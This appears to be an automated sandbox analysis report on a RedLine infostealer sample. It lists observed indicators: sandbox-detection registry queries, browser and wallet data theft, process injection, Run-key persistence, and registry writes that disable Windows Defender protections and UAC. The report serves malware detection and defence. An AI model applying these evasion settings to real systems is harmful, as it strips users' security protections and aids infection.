redline | 9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8917834.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DEpiQfOAYIOV_W38iErqfG0p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	uF4BWdwhJtrCLd15_CKd5bGb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VrhYZyTUFiHxx9ufigih5dzd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VxMgZLfaPN2cCgNt7X4dGKQw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VxMgZLfaPN2cCgNt7X4dGKQw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wPZfFfsDdr7wDZJc1QQ0TXDG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VrhYZyTUFiHxx9ufigih5dzd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8917834.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	uF4BWdwhJtrCLd15_CKd5bGb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wPZfFfsDdr7wDZJc1QQ0TXDG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3392110.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DEpiQfOAYIOV_W38iErqfG0p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3392110.scr

Loads dropped DLL 39 IoCs

pid	Process
2564	setup_install.exe
2564	setup_install.exe
2564	setup_install.exe
2564	setup_install.exe
2564	setup_install.exe
2564	setup_install.exe
5720	setup.tmp
3476	setup.tmp
2392	rundll32.exe
4440	rundll32.exe
6508	rundll32.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5696	LzmwAqmV.exe
5776	rundll32.exe
5776	rundll32.exe
7092	rundll32.exe
7092	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral4/files/0x000300000002b1de-291.dat	themida

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\4209305.scr = "0"	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe = "0"	3TPZzBNybF1mCx6FTAfgky_P.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	4209305.scr
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	4209305.scr
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\1059307.scr = "0"	1059307.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	4209305.scr
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe = "0"	lJZRHUqsNBAxAKw1EXpXsAbv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4209305.scr
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\3645252.scr = "0"	3645252.scr

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	3840480.scr

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 15 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DEpiQfOAYIOV_W38iErqfG0p.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	uF4BWdwhJtrCLd15_CKd5bGb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	1059307.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wPZfFfsDdr7wDZJc1QQ0TXDG.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4209305.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1059307.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	3645252.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8917834.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VrhYZyTUFiHxx9ufigih5dzd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3645252.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	lJZRHUqsNBAxAKw1EXpXsAbv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lJZRHUqsNBAxAKw1EXpXsAbv.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VxMgZLfaPN2cCgNt7X4dGKQw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3392110.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	4209305.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ipinfo.io
1	api.db-ip.com
33	ip-api.com
48	ipinfo.io
52	api.db-ip.com

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
2256	8917834.scr
4044	DEpiQfOAYIOV_W38iErqfG0p.exe
5468	VxMgZLfaPN2cCgNt7X4dGKQw.exe
5232	VrhYZyTUFiHxx9ufigih5dzd.exe
5708	wPZfFfsDdr7wDZJc1QQ0TXDG.exe
5640	uF4BWdwhJtrCLd15_CKd5bGb.exe
6928	3392110.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
6004	4209305.scr
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5712	jyhpR_SJFKvH936H2xPDy9SC.exe
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
5780	1059307.scr
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe
3416	3TPZzBNybF1mCx6FTAfgky_P.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 4912 set thread context of 4088	4912	Sun159ff1acacf.exe	128
PID 5576 set thread context of 5876	5576	lLzbYb05wpviAC5_QBoVEjy7.exe	196
PID 4668 set thread context of 6424	4668	Conhost.exe	246
PID 6004 set thread context of 3988	6004	4209305.scr	264
PID 5712 set thread context of 2556	5712	jyhpR_SJFKvH936H2xPDy9SC.exe	270
PID 5780 set thread context of 6864	5780	1059307.scr	289
PID 3416 set thread context of 5292	3416	3TPZzBNybF1mCx6FTAfgky_P.exe	292
PID 2548 set thread context of 792	2548	lJZRHUqsNBAxAKw1EXpXsAbv.exe	302
PID 7052 set thread context of 6516	7052	3645252.scr	318
PID 5036 set thread context of 7156	5036	services64.exe	331

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst3.exe	7UXcpESJJu1f6oCuDC4HeQI4.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	7UXcpESJJu1f6oCuDC4HeQI4.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	7UXcpESJJu1f6oCuDC4HeQI4.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-NAAQE.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup.tmp
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cm3.exe	7UXcpESJJu1f6oCuDC4HeQI4.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	7UXcpESJJu1f6oCuDC4HeQI4.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
3704	2216	WerFault.exe	109
1800	4136	WerFault.exe	106
2468	4072	WerFault.exe	108
3940	2644	WerFault.exe	103
1480	5688	WerFault.exe	148
5824	2448	WerFault.exe	139
1892	2392	WerFault.exe	188
6712	2620	WerFault.exe	212
2828	5292	WerFault.exe	191
7108	1548	WerFault.exe	201
5220	1896	WerFault.exe	158
6804	5892	WerFault.exe	216
3128	6004	WerFault.exe	173
3500	5712	WerFault.exe	211
6640	5480	WerFault.exe	167
7152	2548	WerFault.exe	200
5608	7052	WerFault.exe	237

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lLzbYb05wpviAC5_QBoVEjy7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lLzbYb05wpviAC5_QBoVEjy7.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lLzbYb05wpviAC5_QBoVEjy7.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2960	schtasks.exe
5068	schtasks.exe

Enumerates system info in registry 2 TTPs 34 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4244	taskkill.exe
5928	taskkill.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	sihclient.exe
